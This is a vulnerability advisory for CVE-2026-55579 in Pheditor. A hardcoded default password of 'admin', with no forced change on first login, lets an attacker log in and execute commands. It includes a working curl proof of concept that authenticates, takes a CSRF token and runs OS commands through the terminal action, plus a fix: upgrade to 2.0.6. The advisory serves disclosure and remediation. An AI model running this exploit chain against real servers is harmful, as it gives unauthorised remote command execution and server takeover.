CVE-2026-55579: Pheditor Hardcoded Default Password Enables Unauthenticated RCE
Pheditor ships with a hardcoded default password 'admin' and no forced change on first login, letting any remote attacker authenticate and immediately reach file upload and terminal features for full
The problem
Pheditor stores the SHA-512 hash of the string 'admin' as a compile-time constant at pheditor.php line 11. There is no setup wizard, no first-login enforcement, and no password expiry.
Any attacker who knows the default (publicly documented in the README and source) can authenticate with zero brute force. Once in, the terminal action and file upload features allow arbitrary command execution and webshell upload, giving full control of the server.
Proof of concept
A working proof-of-concept for CVE-2026-55579 in pheditor/pheditor, with the exact payload below.
# Step 1: authenticate with the default password
curl -s -c /tmp/cookies.txt -X POST http://TARGET/pheditor.php \
-d 'pheditor_password=admin' -L -o /dev/null -w "%{http_code}"
# Expected: 200
# Step 2: grab a CSRF token from the authenticated session
TOKEN=$(curl -s -b /tmp/cookies.txt http://TARGET/pheditor.php | \
grep -o 'token = "[a-f0-9]*"' | grep -o '"[a-f0-9]*"' | tr -d '"')
# Step 3: execute arbitrary commands via the terminal action
curl -s -b /tmp/cookies.txt -X POST http://TARGET/pheditor.php \
--data-urlencode 'action=terminal' \
--data-urlencode "token=$TOKEN" \
--data-urlencode 'command=echo `id`' \
--data-urlencode 'dir='
# Expected: uid=33(www-data) ... proves full OS accessThe login check at pheditor.php computes `hash('sha512', $_POST['pheditor_password'])` and compares it to the PASSWORD constant. The constant ships as the SHA-512 of 'admin' (`c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec`), a value publicly known from the source.
Because there is no forced change on first login, this credential is permanently valid on any default deployment. The visual warning banner at lines 1956-1958 is the only mitigation, and it is trivially ignored.
The patch in 2.0.6 introduces a setup/forced-change flow that blocks normal application access until the default password has been replaced, so the hardcoded hash is no longer sufficient to reach the editor. The root cause is CWE-798 (Use of Hard-coded Credentials).
The fix
Upgrade to pheditor/pheditor 2.0.6 or later. Version 2.0.6 adds a forced first-login password change that prevents access to the editor until the default 'admin' password has been replaced. Additionally, consider adopting password_hash()/password_verify() with PASSWORD_BCRYPT instead of raw unsalted SHA-512 for future-proof credential storage.
Reported by Thai Son Dinh, VinSOC Labs (R&D).
Related research
- high · 8.8CVE-2026-55578CVE-2026-55578: Pheditor OS Command Injection via Incomplete Terminal Blocklist
- highCVE-2026-62944CVE-2026-62944: MantisBT Stored XSS via Attachment Filename in HTML Export
- criticalCVE-2026-52881CVE-2026-52881: MantisBT Reflected XSS in admin/install.php
- criticalCVE-2026-52847CVE-2026-52847: MantisBT Reflected XSS in admin/install.php